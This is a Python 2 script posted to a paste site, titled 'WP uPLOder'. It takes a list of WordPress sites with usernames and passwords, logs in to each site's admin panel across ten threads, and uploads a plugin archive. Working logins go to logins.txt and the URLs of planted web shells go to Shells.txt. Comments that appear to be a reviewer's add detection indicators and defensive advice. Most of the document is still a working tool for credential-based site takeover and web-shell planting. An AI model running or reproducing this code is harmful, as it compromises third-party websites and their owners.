
Untitled

a guest
Apr 4th, 2018
  1. #!/user/bin/python
  2.  
  3. import requests
  4. import sys, re, os
  5. from multiprocessing import Pool
  6. from multiprocessing.dummy import Pool as ThreadPool
  7. from platform import system
  8.  
  9. log = '''\n
  10. WP uPLOder
  11. '
  12. \n'''
  13.  
  # Banner printed once at start-up. The bare print statement means the
  # script targets Python 2.
  14. print log
  15.  
  16. def WploginShell(url):
  # Handles one input line: parses a site, user name and password out of
  # `url`, submits them to the site's wp-login.php and, if the response
  # contains the admin-bar logout item, posts the file named in sys.argv[2]
  # to the plugin-upload endpoint and then requests a fixed path under
  # /wp-content/plugins/sigma-wp/. Returns nothing; results go to stdout,
  # logins.txt and Shells.txt.
  # NOTE(review): the paste lost its indentation, so the nesting of the
  # try/if/else branches below is inferred from statement order.
  # NOTE(review): Python 2 only (print statements, str response bodies).
  17.  
  18.  
  # Fixed browser User-Agent. It is passed only on the three POSTs below;
  # the GETs carry no headers= argument, so they go out with the requests
  # library's default User-Agent. One client alternating between the two
  # within seconds is a usable log-correlation signal.
  19. Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  20.  
  # One session object, so cookies set at login are reused by later lib.* calls.
  21. lib = requests.session()
  22. try:
  23.  
  24.  
  25. ## Words Regex
  # Host is whatever sits between 'http://' and '/wp-login.php' in the line.
  26. First = re.findall('http://(.*?)/wp-login.php',url)
  27. site = 'http://'+First[0]
  28. GetRegex= lib.get(site+'/wp-login.php')
  29.  
  30. # Regex Words of login
  # Reads the submit button's label from the login form; it is echoed back
  # as the wp-submit field of the login POST.
  31. Regex = re.findall('"button button-primary button-large" value="(.*?)"',GetRegex.content)
  32.  
  33. # User and Pass get it from File
  # User name = text between '@' and '#'; password = text between '&' and '@'.
  34. User = re.findall('@(.*?)#',url)
  35. Passwd = re.findall('&(.*?)@',url)
  36.  
  37. # Post Data login
  38. Pax = {'log':User[0],
  39. 'pwd':Passwd[0],
  40. 'wp-submit':Regex[0],
  41. 'redirect_to': site+'/wp-admin/',
  42. 'testcookie':'1'}
  43.  
  # A single login POST per input line; the response object is printed twice.
  44. req = lib.post(site+'/wp-login.php', data=Pax, headers=Headers)
  45. print req
  46. print req
  # Success test: the admin bar's logout list item appears in the response body.
  47. if '<li id="wp-admin-bar-logout">' in req.content:
  # Working credentials are appended in plaintext to logins.txt in the
  # current directory - a forensic artefact on the operator's host.
  48. save = open("logins.txt", 'a')
  49. save.write('[+]Login Success '+'\n'+"[#]Target:"+site+'\n'+'[#]UserName:'+User[0]+'\n'+'[#]Password:'+Passwd[0])
  50. save.close()
  51. print '[+]Login Success '+'\n'+"[#]Target:"+site+'\n'+'[#]UserName:'+User[0]+'\n'+'[#]Password:'+Passwd[0]
  52.  
  53. # Path for get Data
  # Fetches the plugin-upload form to read its _wpnonce value and submit label.
  54. reqs = lib.get(site+'/wp-admin/plugin-install.php?tab=upload')
  55.  
  56. Regex1 = re.findall('id="_wpnonce" name="_wpnonce" value="(.*?)"',reqs.content)
  57.  
  58. Regex2 = re.findall('id="install-plugin-submit" class="button" value="(.*?)"',reqs.content)
  59.  
  60. # Shell Uploads
  # The archive to upload is named by the second command-line argument.
  61. FileUpload = sys.argv[2]
  62. b0x = {'_wpnonce':Regex1[0],
  63. '_wp_http_referer':site+'/wp-admin/plugin-install.php?tab=upload',
  64. 'install-plugin-submit':Regex2[0] }
  65.  
  66. b0x2 = {'pluginzip':(FileUpload, open(FileUpload, 'rb'), 'multipart/form-data')}
  67.  
  # Two POSTs to the same endpoint: the first carries the nonce fields, the
  # second sends only the file part.
  # NOTE(review): the second request has no nonce, so WordPress presumably
  # rejects it - confirm. Either way, a login POST followed within seconds by
  # this pair is a distinctive sequence in access logs.
  68. login = lib.post(site+'/wp-admin/update.php?action=upload-plugin',data=b0x, files=b0x2, headers=Headers )
  69.  
  70. uploads = lib.post(site+'/wp-admin/update.php?action=upload-plugin',files=b0x2, headers=Headers )
  71.  
  # The check is made with requests.get, i.e. outside the session: no login
  # cookies and the library's default User-Agent. It looks for 'OK' in the body.
  72. exploit = requests.get(site+'/wp-content/plugins/sigma-wp/gfaddoncommon.php')
  73. if 'OK' in exploit.content:
  74. print "[#]:Uploaded Done :"+site
  # NOTE(review): the path written to Shells.txt (20171820.php) differs from
  # the one probed above (gfaddoncommon.php). Both sit under
  # wp-content/plugins/sigma-wp/ and are this page's file-level indicators.
  # Defender side: alert on plugin directories that no administrator
  # installed, and consider DISALLOW_FILE_MODS in wp-config.php, which turns
  # off plugin upload from the dashboard.
  75. open('Shells.txt', 'a').write(site+'/wp-content/plugins/sigma-wp/20171820.php'+'\n')
  76. else:
  77. print "[-]Fail Uploaded !!!!!!!!>"+site
  78. else:
  79. print '[-] Login Fail '+site
  80.  
  # Bare except: every error (a regex with no match, a network failure, a
  # missing sys.argv[2]) is swallowed without any output.
  81. except:
  82. pass
  83.  
  84.  
  85. def start():
  # Sequential driver: strips each line read from the module-level `Files`
  # handle and passes it to WploginShell, ignoring any exception. `Files` is
  # only assigned further down, at module level.
  # NOTE(review): nothing on this page calls start(); the thread pool at the
  # bottom of the script is what actually runs.
  86.  
  87. for i in Files.readlines():
  88. try:
  89. i = i.strip()
  90. data=WploginShell(i)
  91.  
  92. except:
  93. pass
  94.  
  # Entry point: sys.argv[1] names the input list, one target line per row.
  # Ten worker threads (multiprocessing.dummy's thread-backed Pool) map
  # WploginShell over the lines of the open file.
  # NOTE(review): each site sees one login attempt per listed credential, so
  # lockout thresholds tuned for brute force will presumably not trigger. A
  # second factor on administrator accounts is the control that still applies
  # when the password itself is known.
  95. Files = open(sys.argv[1], 'r')
  96. pool = ThreadPool(10)
  97. pool.map(WploginShell, Files)
  98. pool.close()
  99. pool.join()